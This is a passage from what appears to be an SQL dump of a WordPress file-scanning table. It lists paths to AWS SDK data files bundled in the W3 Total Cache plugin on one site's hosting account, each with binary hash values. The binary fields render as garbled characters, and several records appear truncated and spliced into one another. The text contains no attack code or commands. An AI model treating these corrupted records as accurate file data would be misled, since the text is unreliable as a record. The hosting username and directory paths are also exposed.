ly','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iot/2015-05-28/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iot/2015-05-28/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R$Zd\\;V','Ch)=\'y-͊uv','',0,'?'),('fE9NW_@','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iot-jobs-data/2017-09-29/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iot-jobs-data/2017-09-29/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r+oY>^7\\','=\rz\n/NqqC+iQ߷Y','',0,'?'),('gye\r\0n#vs','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iot-jobs-data/2017-09-29/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iot-jobs-data/2017-09-29/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0b&@)~<1','5.*I&.R܏m[Nu\'.&','',0,'?'),('[].HeL =','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iot1click-devices/2018-05-14/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iot1click-devices/2018-05-14/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%Vt ΋d5kA','\\` ,\Zt=u \n`:','',0,'?'),('#4~yW6~+-','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iot1click-projects/2018-05-14/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iot1click-projects/2018-05-14/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' 6N7:+p','=EBpl\0*=pEy','',0,'?'),('b]C_dm','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iot1click-projects/2018-05-14/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iot1click-projects/2018-05-14/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Lm=F2)','jkgv7IjzuѶc','',0,'?'),('rY4>\nG)9g','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotanalytics/2017-11-27/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotanalytics/2017-11-27/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ȝ@\00D\'.V ','u\rLACSkLɮ|l','',0,'?'),('j\0W\ZF','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotanalytics/2017-11-27/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotanalytics/2017-11-27/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','쿨{~Vu͒l',' :82>OCX]:bs%~&','',0,'?'),('8vP>9[66','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotdeviceadvisor/2020-09-18/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotdeviceadvisor/2020-09-18/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r 7:P utk','q>ME: Ӡ؛cmIT@73/','',0,'?'),('^tOz- 7t5','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotdeviceadvisor/2020-09-18/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotdeviceadvisor/2020-09-18/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e {Y ','Q','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotevents/2018-07-27/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotevents/2018-07-27/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y9pZ}ckdu','u5=3hQ,֝rgF,I','',0,'?'),('3e-aml*\'','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotevents-data/2018-10-23/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotevents-data/2018-10-23/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(u:i\nP/','5a]b-!g!TmҎ/`\\\Z\0','',0,'?'),('rE|s(F@b','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotevents-data/2018-10-23/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotevents-data/2018-10-23/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>/Re1#ݠ','48;xv ^ћ-\0^9\Z','',0,'?'),('\Z9\'31\r','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotfleethub/2020-11-03/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotfleethub/2020-11-03/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_/\Z&ƛ\\zA','vٜIjv&i8J<','',0,'?'),('8%gs@','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotfleethub/2020-11-03/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotfleethub/2020-11-03/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','* ye}QLI[','I%1@4PSo H','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotthingsgraph/2018-09-06/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotthingsgraph/2018-09-06/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t=Jy߈l','UQ^[Rُ0{}F;IK?','',0,'?'),('Dw[tj[U','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotthingsgraph/2018-09-06/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotthingsgraph/2018-09-06/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z\'K\'{','A$1\r;R*GSܵl:','',0,'?'),('0B%\'^bc-','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotwireless/2020-11-22/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotwireless/2020-11-22/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l}.KqmNcXLY','X_샻.\rvpNm','',0,'?'),('ք*/N/c_0᭰','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotwireless/2020-11-22/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotwireless/2020-11-22/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9swдC~?|چ','\Z#Yگ_6\"#(\\j=z-tsRI','',0,'?'),('P{\rfS4K','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ivs/2020-07-14/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ivs/2020-07-14/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$|\0/ c!XJ','9I/TdOyo&g','',0,'?'),('37Ǭd7','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ivs/2020-07-14/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ivs/2020-07-14/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N:^Kt^','k?5wJ.c\r!|D%oz#⩈','',0,'?'),('yg |hy(΄','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kafka/2018-11-14/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kafka/2018-11-14/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WѕcCr]','uO&!MmWUSR*ghyz','l_$Pd0Kߟx攆lU.#ed','',0,'?'),('XQdIk','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kinesis-video-archived-media/2017-09-30/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kinesis-video-archived-media/2017-09-30/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&A!#','{Q{F^NybU[/rR:E:/','',0,'?'),('5Y&o Ckc','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kinesis-video-media/2017-09-30/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kinesis-video-media/2017-09-30/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','aHH\r\\6d;','%-e#.?+f3Nh','',0,'?'),('2ۯ?R[\n','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kinesis-video-media/2017-09-30/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kinesis-video-media/2017-09-30/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`*46[I\\^w%','$XXw=SVvMB u-]E[','',0,'?'),('6Qb U?','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kinesis-video-signaling/2019-12-04/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kinesis-video-signaling/2019-12-04/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m\nl|e(H','k{ I%H1E[E}','',0,'?'),('q5؂x','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kinesis-video-signaling/2019-12-04/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kinesis-video-signaling/2019-12-04/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V|(VBR','%H(5\"Wp5vY','',0,'?'),('\Z\"@9a[$','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kinesisanalytics/2015-08-14/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kinesisanalytics/2015-08-14/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' \"vKбs','}^\"HPoYbZ1U̪fT\Z','',0,'?'),(' ZO=|v\Z','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kinesisanalytics/2015-08-14/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kinesisanalytics/2015-08-14/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ɮ1\0ڠ[)[','7iǍyfˈH.d','',0,'?'),('-%P-BV,Ž(','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kinesisanalyticsv2/2018-05-23/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kinesisanalyticsv2/2018-05-23/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2m=KRTt4','J[Íϲ}.TЪ!WAtƆhm.','',0,'?'),('\\G@','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kinesisanalyticsv2/2018-05-23/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kinesisanalyticsv2/2018-05-23/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d\nR6wju\rp','O/QwC~ spi*','',0,'?'),('툣Sr>ʇE','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kinesisvideo/2017-09-30/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kinesisvideo/2017-09-30/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-<{ŷ','_*>,}w q%Lƕ','',0,'?'),('m&hlONC','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kinesisvideo/2017-09-30/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kinesisvideo/2017-09-30/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IeR64늸M!\'\Z','R23=b3XuBM\\=5','',0,'?'),('g:p3r','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kms/2014-11-01/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kms/2014-11-01/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zzŻ޽\rx ','ΒMȠs%a&2+;n','',0,'?'),('X4N J','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kms/2014-11-01/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kms/2014-11-01/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')|gtق','7M-D:Ojr?څhi-','',0,'?'),('Eg@T8VtDy','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kms/2014-11-01/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kms/2014-11-01/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$vےs\\K','toEW:Lat*c GT;\\','',0,'?'),('Er{R9f@=3w','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lakeformation/2017-03-31/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lakeformation/2017-03-31/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-̠hg}5I^','3 t^$W8^v/','',0,'?'),(',q ^%m','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lakeformation/2017-03-31/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lakeformation/2017-03-31/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9AUU','Ser&uʹz\'A!_o D16h >','',0,'?'),('SD\Z1\"D','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lambda/2015-03-31/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lambda/2015-03-31/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yoaXҚ:A',' If&6\\zފ9 <bJܼ','>sZ6W|?k iz}*OV','',0,'?'),('B{P!k@Fu(5|','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lambda/2015-03-31/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lambda/2015-03-31/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ɠ1n)F5','\'k݋b(qz imRۇ','',0,'?'),('ډ˙8J9#G]{+','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lambda/2015-03-31/waiters-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lambda/2015-03-31/waiters-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','94LhzX','$g+9-|Y3p$D>[','',0,'?'),('Ј# l^G','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lex-models/2017-04-19/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lex-models/2017-04-19/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8; H¢⤽x','X*}o?ktV \Zϓ,ro','',0,'?'),('FN?hU{k','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lex-models/2017-04-19/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lex-models/2017-04-19/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ǒ&zI#.','=Z83 VSS0Ԭ~(:]','',0,'?'),('}E\Z¤\r','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/license-manager/2018-08-01/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/license-manager/2018-08-01/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z^JBxOkE','X]x1i?#rI90<|','',0,'?'),('4{,1njԈ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/license-manager/2018-08-01/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/license-manager/2018-08-01/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4O(((pg2',' Xk~u^T\r7C wđ ߑ','',0,'?'),('}Bo98J','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lightsail/2016-11-28/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lightsail/2016-11-28/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yffm',':b?ݢM۾ya U)/zJ\"','',0,'?'),('\"e#Ҡe','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lightsail/2016-11-28/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lightsail/2016-11-28/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ꖻ&<3T','KE_^#L$6GࣃRU#»','',0,'?'),('.gmh|jJ*q','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lightsail/2016-11-28/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lightsail/2016-11-28/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lpo#','ti9 >LnβSQ1LZ1R%Y\Z[Y','',0,'?'),('Ɉ˘&;C`<:','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/location/2020-11-19/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/location/2020-11-19/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','DjR!1d','V¬/peˎ6Ly.YxmO','',0,'?'),(']\\TkeM`cϡ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/location/2020-11-19/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/location/2020-11-19/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Kߗia}',':(n}}v}`9i','',0,'?'),('\0I*%|S0','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/logs/2014-03-28/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/logs/2014-03-28/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C?&.cg^㎑\n','A y~RB$8h|߷Tsn','',0,'?'),('EǴ2Jt^','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/logs/2014-03-28/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/logs/2014-03-28/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{L^t9jx7','7]Eh[{ukIE(D%\n/P','',0,'?'),('.VZ\'MUZ3^','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/logs/2014-03-28/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/logs/2014-03-28/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<9}<׳e','_\nR`KӠ4A70[\\Cӗ.','',0,'?'),('Lc \r\0Yj]','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lookoutequipment/2020-12-15/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lookoutequipment/2020-12-15/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p>9?H',' gLj\rjz* BfH@\',','',0,'?'),('ԃGn[4fL\'v','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lookoutequipment/2020-12-15/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lookoutequipment/2020-12-15/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%Klp)p',' &o/JO-ï6Hoe^`qʬ','',0,'?'),('o\nx2\nLaR','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lookoutmetrics/2017-07-25/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lookoutmetrics/2017-07-25/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ҖWMMR\r?','dQ\'!%u8-X!.Uk\0[c','',0,'?'),('\r9@Am2u鶽','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lookoutmetrics/2017-07-25/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lookoutmetrics/2017-07-25/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E E|/>','D4EHoXN/BAGd','',0,'?'),('pa\"Og·>C','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lookoutvision/2020-11-20/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lookoutvision/2020-11-20/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!DN@j7d','I9| o)UMդ:#] \\','',0,'?'),('^bܦq','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lookoutvision/2020-11-20/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lookoutvision/2020-11-20/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+&ڴZ);>i','ǨfkpnvRB-5P{ŦS','',0,'?'),('/*vIFk+M(','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/machinelearning/2014-12-12/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/machinelearning/2014-12-12/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l\'vU.필d_','q^*hf< iq¯܉%fkxf','',0,'?'),('^\r;͇ < +','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/machinelearning/2014-12-12/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/machinelearning/2014-12-12/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|ҲDREݨ','zzHS&WL*xЊN :','',0,'?'),('T`gK~wyj+w7+o','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/machinelearning/2014-12-12/waiters-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/machinelearning/2014-12-12/waiters-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o-kTm4','ߠz]V','',0,'?'),('v%=¢','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/macie2/2020-01-01/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/macie2/2020-01-01/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+at3eGpGw','KKHG_SJC p2=1','',0,'?'),('.g³5M)\0( ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/managedblockchain/2018-09-24/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/managedblockchain/2018-09-24/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Yx%g','rY+@~f,Icٱ!㞜','',0,'?'),('D3VLB--%7','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/managedblockchain/2018-09-24/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/managedblockchain/2018-09-24/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','84\' Ho\"%','a k~aO1zvXK/pT','',0,'?'),('=B.%','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/manifest.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/manifest.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*\\\ZA:}','y;mb>I(DB/?vF}7','',0,'?'),('@߷^Xk⌖','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/marketplace-catalog/2018-09-17/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/marketplace-catalog/2018-09-17/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6%TҩI!','INa\03ko%؏\0m ɘٱ','',0,'?'),(',\r\'Z Kq','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/marketplace-catalog/2018-09-17/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/marketplace-catalog/2018-09-17/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~#7','#w9\')\'ѱO\nxKOaYk҅ds','',0,'?'),('n`u$ hT/','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/marketplacecommerceanalytics/2015-07-01/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/marketplacecommerceanalytics/2015-07-01/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0% k/','ZQXM\" 